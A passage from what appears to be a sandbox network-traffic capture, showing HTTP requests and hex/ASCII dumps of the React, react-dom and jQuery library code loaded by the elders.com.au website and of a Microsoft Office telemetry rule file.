                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                                                                                            etag: W/"1ad6b-kNV4OIuev8g4lblTOp0VuOU34Qg"
                                                                                                                                                                                                            via: 1.1 fly.io
                                                                                                                                                                                                            fly-request-id: 01JB1FAX2F93CYQ7KRKFYC268G-dfw
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1023268
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b020dd1528e0-DFW
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC792INData Raw: 37 64 36 30 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62
                                                                                                                                                                                                            Data Ascii: 7d60/** * @license React * react.development.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function (glob
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 65 6c 65 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 4f 52 54 41 4c 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 6f 72 74 61 6c 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 46 52 41 47 4d 45 4e 54 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 53 54 52 49 43 54 5f 4d 4f 44 45 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 73 74 72 69 63 74 5f 6d 6f 64 65 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 52 4f 46 49 4c 45 52 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 72 6f
                                                                                                                                                                                                            Data Ascii: Symbol.for('react.element'); var REACT_PORTAL_TYPE = Symbol.for('react.portal'); var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment'); var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode'); var REACT_PROFILER_TYPE = Symbol.for('react.pro
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 0a 20 20 20 2a 20 4b 65 65 70 73 20 74 72 61 63 6b 20 6f 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 62 61 74 63 68 27 73 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 68 6f 77 20 6c 6f 6e 67 20 61 6e 20 75 70 64 61 74 65 0a 20 20 20 2a 20 73 68 6f 75 6c 64 20 73 75 73 70 65 6e 64 20 66 6f 72 20 69 66 20 69 74 20 6e 65 65 64 73 20 74 6f 2e 0a 20 20 20 2a 2f 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 42 61 74 63 68 43 6f 6e 66 69 67 20 3d 20 7b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6e 75 6c 6c 0a 20 20 7d 3b 0a 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 41 63 74 51 75 65 75 65 20 3d 20 7b 0a 20 20 20 20 63 75 72 72 65 6e 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 2f 2f 20 55 73 65 64 20 74 6f 20 72
                                                                                                                                                                                                            Data Ascii: * Keeps track of the current batch's configuration such as how long an update * should suspend for if it needs to. */ var ReactCurrentBatchConfig = { transition: null }; var ReactCurrentActQueue = { current: null, // Used to r
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 20 20 20 20 20 76 61 72 20 69 6d 70 6c 20 3d 20 52 65 61 63 74 44 65 62 75 67 43 75 72 72 65 6e 74 46 72 61 6d 65 2e 67 65 74 43 75 72 72 65 6e 74 53 74 61 63 6b 3b 0a 0a 20 20 20 20 20 20 69 66 20 28 69 6d 70 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 73 74 61 63 6b 20 2b 3d 20 69 6d 70 6c 28 29 20 7c 7c 20 27 27 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 61 63 6b 3b 0a 20 20 20 20 7d 3b 0a 20 20 7d 0a 0a 20 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 53 63 6f 70 65 41 50 49 20 3d 20 66
                                                                                                                                                                                                            Data Ascii: var impl = ReactDebugCurrentFrame.getCurrentStack; if (impl) { stack += impl() || ''; } return stack; }; } // ----------------------------------------------------------------------------- var enableScopeAPI = f
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 20 61 72 67 73 5b 5f 6b 65 79 20 2d 20 31 5d 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 5f 6b 65 79 5d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 72 69 6e 74 57 61 72 6e 69 6e 67 28 27 77 61 72 6e 27 2c 20 66 6f 72 6d 61 74 2c 20 61 72 67 73 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 65 72 72 6f 72 28 66 6f 72 6d 61 74 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 5f 6c 65 6e 32 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 20 61 72 67 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 5f 6c 65 6e 32 20 3e 20 31 20 3f 20 5f 6c 65 6e 32 20 2d 20 31 20 3a 20 30 29 2c 20 5f 6b 65 79 32 20 3d 20 31 3b 20 5f 6b 65 79 32 20 3c
                                                                                                                                                                                                            Data Ascii: args[_key - 1] = arguments[_key]; } printWarning('warn', format, args); } } } function error(format) { { { for (var _len2 = arguments.length, args = new Array(_len2 > 1 ? _len2 - 1 : 0), _key2 = 1; _key2 <
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 64 61 74 65 46 6f 72 55 6e 6d 6f 75 6e 74 65 64 43 6f 6d 70 6f 6e 65 6e 74 20 3d 20 7b 7d 3b 0a 0a 20 20 66 75 6e 63 74 69 6f 6e 20 77 61 72 6e 4e 6f 6f 70 28 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2c 20 63 61 6c 6c 65 72 4e 61 6d 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 76 61 72 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 3d 20 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6d 70 6f 6e 65 6e 74 4e 61 6d 65 20 3d 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 26 26 20 28 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 64 69 73 70 6c 61 79 4e 61 6d 65 20 7c 7c 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 20 7c 7c 20 27 52 65 61 63 74 43 6c 61 73 73 27 3b 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: dateForUnmountedComponent = {}; function warnNoop(publicInstance, callerName) { { var _constructor = publicInstance.constructor; var componentName = _constructor && (_constructor.displayName || _constructor.name) || 'ReactClass';
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 69 73 20 77 68 65 6e 20 79 6f 75 20 6b 6e 6f 77 20 74 68 61 74 20 73 6f 6d 65 20 64 65 65 70 65 72 20 61 73 70 65 63 74 20 6f 66 20 74 68 65 0a 20 20 20 20 20 2a 20 63 6f 6d 70 6f 6e 65 6e 74 27 73 20 73 74 61 74 65 20 68 61 73 20 63 68 61 6e 67 65 64 20 62 75 74 20 60 73 65 74 53 74 61 74 65 60 20 77 61 73 20 6e 6f 74 20 63 61 6c 6c 65 64 2e 0a 20 20 20 20 20 2a 0a 20 20 20 20 20 2a 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 69 6e 76 6f 6b 65 20 60 73 68 6f 75 6c 64 43 6f 6d 70 6f 6e 65 6e 74 55 70 64 61 74 65 60 2c 20 62 75 74 20 69 74 20 77 69 6c 6c 20 69 6e 76 6f 6b 65 0a 20 20 20 20 20 2a 20 60 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 70 64 61 74 65 60 20 61 6e 64 20 60 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 60 2e 0a 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: is when you know that some deeper aspect of the * component's state has changed but `setState` was not called. * * This will not invoke `shouldComponentUpdate`, but it will invoke * `componentWillUpdate` and `componentDidUpdate`.
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 69 63 49 6e 73 74 61 6e 63 65 2c 20 27 72 65 70 6c 61 63 65 53 74 61 74 65 27 29 3b 0a 20 20 20 20 7d 2c 0a 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 53 65 74 73 20 61 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 54 68 69 73 20 6f 6e 6c 79 20 65 78 69 73 74 73 20 62 65 63 61 75 73 65 20 5f 70 65 6e 64 69 6e 67 53 74 61 74 65 20 69 73 0a 20 20 20 20 20 2a 20 69 6e 74 65 72 6e 61 6c 2e 20 54 68 69 73 20 70 72 6f 76 69 64 65 73 20 61 20 6d 65 72 67 69 6e 67 20 73 74 72 61 74 65 67 79 20 74 68 61 74 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 64 65 65 70 0a 20 20 20 20 20 2a 20 70 72 6f 70 65 72 74 69 65 73 20 77 68 69 63 68 20 69 73 20 63 6f 6e 66 75 73 69 6e 67 2e 20 54 4f 44 4f 3a 20 45 78 70 6f 73 65 20 70 65
                                                                                                                                                                                                            Data Ascii: icInstance, 'replaceState'); }, /** * Sets a subset of the state. This only exists because _pendingState is * internal. This provides a merging strategy that is not available to deep * properties which is confusing. TODO: Expose pe
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 61 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 41 6c 77 61 79 73 20 75 73 65 20 74 68 69 73 20 74 6f 20 6d 75 74 61 74 65 0a 20 20 20 2a 20 73 74 61 74 65 2e 20 59 6f 75 20 73 68 6f 75 6c 64 20 74 72 65 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 73 20 69 6d 6d 75 74 61 62 6c 65 2e 0a 20 20 20 2a 0a 20 20 20 2a 20 54 68 65 72 65 20 69 73 20 6e 6f 20 67 75 61 72 61 6e 74 65 65 20 74 68 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 77 69 6c 6c 20 62 65 20 69 6d 6d 65 64 69 61 74 65 6c 79 20 75 70 64 61 74 65 64 2c 20 73 6f 0a 20 20 20 2a 20 61 63 63 65 73 73 69 6e 67 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 66 74 65 72 20 63 61 6c 6c 69 6e 67 20 74 68 69 73 20 6d 65 74 68 6f 64 20 6d 61 79 20 72 65 74 75 72 6e 20 74 68 65
                                                                                                                                                                                                            Data Ascii: a subset of the state. Always use this to mutate * state. You should treat `this.state` as immutable. * * There is no guarantee that `this.state` will be immediately updated, so * accessing `this.state` after calling this method may return the
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 6c 29 20 7b 0a 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 73 65 74 53 74 61 74 65 28 2e 2e 2e 29 3a 20 74 61 6b 65 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 20 74 6f 20 75 70 64 61 74 65 20 6f 72 20 61 20 27 20 2b 20 27 66 75 6e 63 74 69 6f 6e 20 77 68 69 63 68 20 72 65 74 75 72 6e 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 2e 27 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 74 68 69 73 2e 75 70 64 61 74 65 72 2e 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 28 74 68 69 73 2c 20 70 61 72 74 69 61 6c 53 74 61 74 65 2c 20 63 61 6c 6c 62 61 63 6b 2c 20 27 73 65 74 53 74 61 74 65 27 29 3b 0a 20 20 7d 3b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 46 6f
                                                                                                                                                                                                            Data Ascii: l) { throw new Error('setState(...): takes an object of state variables to update or a ' + 'function which returns an object of state variables.'); } this.updater.enqueueSetState(this, partialState, callback, 'setState'); }; /** * Fo


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            76192.168.2.45773913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                            x-ms-request-id: e7073254-701e-000d-07b1-2f6de3000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-15869dbbcc6lq45jhC1DFW7zwg00000006n0000000006v2b
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            77192.168.2.457745104.17.245.2034432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC575OUTGET /react-dom@18/umd/react-dom.development.js HTTP/1.1
                                                                                                                                                                                                            Host: unpkg.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC553INHTTP/1.1 302 Found
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            cache-control: public, s-maxage=600, max-age=60
                                                                                                                                                                                                            location: /react-dom@18.3.1/umd/react-dom.development.js
                                                                                                                                                                                                            vary: Accept
                                                                                                                                                                                                            via: 1.1 fly.io
                                                                                                                                                                                                            fly-request-id: 01JBZYS8WMVH9K9PQ2TADM73Z7-dfw
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 437
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b020fb58e73e-DFW
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC74INData Raw: 34 34 0d 0a 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 72 65 61 63 74 2d 64 6f 6d 40 31 38 2e 33 2e 31 2f 75 6d 64 2f 72 65 61 63 74 2d 64 6f 6d 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0d 0a
                                                                                                                                                                                                            Data Ascii: 44Found. Redirecting to /react-dom@18.3.1/umd/react-dom.development.js
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            78192.168.2.457746172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC426OUTGET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:49 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Mon, 30 Sep 2024 10:02:26 GMT
                                                                                                                                                                                                            etag: W/"250df-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 585177
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210119-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1727690545.479718,VS0,VS0,VE1003
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0214833e54e-DFW
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC741INData Raw: 37 64 32 61 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 73 69 74 65 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 36 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 65 78 70 6f 72 74 73 3f 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 6f 63 75 6d 65 6e 74 3f 6e 28 74 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20
                                                                                                                                                                                                            Data Ascii: 7d2a/*! For license information please see site.js.LICENSE.txt */!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 6e 74 2c 77 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 6f 2c 69 3d 28 6e 3d 6e 7c 7c 62 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 69 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 77 29 28 6f 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 6f 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29
                                                                                                                                                                                                            Data Ascii: nt,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e)
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 2e 70 75 73 68 53 74 61 63 6b 28 6e 3e 3d 30 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 63 2c 73 6f 72 74 3a 69 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 69 2e 73 70 6c 69 63 65 7d 2c 43 2e 65 78 74 65 6e 64 3d 43 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 2c 69 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 63 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 63 3d 61
                                                                                                                                                                                                            Data Ascii: .pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:c,sort:i.sort,splice:i.splice},C.extend=C.fn.extend=function(){var e,t,n,r,o,i,a=arguments[0]||{},s=1,l=arguments.length,c=!1;for("boolean"==typeof a&&(c=a
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 26 28 53 28 4f 62 6a 65 63 74 28 65 29 29 3f 43 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 63 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 75 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6b 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72
